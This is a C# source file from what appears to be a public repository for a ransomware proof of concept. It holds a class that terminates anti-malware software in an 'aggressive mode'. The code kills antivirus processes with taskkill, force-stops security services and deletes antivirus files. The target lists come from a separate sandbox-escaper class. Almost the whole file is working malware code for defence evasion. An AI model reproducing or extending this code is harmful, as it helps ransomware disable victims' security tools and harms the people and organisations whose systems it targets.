-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathAntiMalwareTerminator.cs
83 lines (69 loc) · 2.21 KB
/
AntiMalwareTerminator.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
namespace Ilay_sRanomwarePoc
{
static class AntiMalwareTerminator //a class that contains the functionality for the aggressive-Mode
{
private const bool AntiMalwareFilesRemoval = true; //you can set false if you dont want to harm the sandboxes
static public void TerminateAntiMalwarePrograms()
{
try
{
KillAntiMalwareProcesses();
TerminateAntiMalwareServices();
if (AntiMalwareFilesRemoval)
{
DeleteAntiMalwareResources();
}
}
catch
{
Console.WriteLine("An Erroe while treminating anti malware programs");
}
}
static public void KillAntiMalwareProcesses()
{
foreach (string Process in SandboxEscaper.ProcessesToKill)
{
try
{
CommandLineExecution.CommandExecution($"taskkill /IM {Process} ");
}
catch
{
Console.WriteLine("Error while killing a process");
}
}
}
public static void TerminateAntiMalwareServices()
{
foreach (string Service in SandboxEscaper.ServicesToKill)
{
try
{
CommandLineExecution.CommandExecution($"taskkill /F /FI SERVICES eq {Service}");
}
catch
{
Console.WriteLine("An Error while killing a service");
}
}
}
public static void DeleteAntiMalwareResources()
{
foreach (string Resource in SandboxEscaper.ResourcesToDelete)
{
try
{
File.Delete(Resource);
}
catch
{
Console.WriteLine("An Error while deleting a resource");
}
}
}
}
}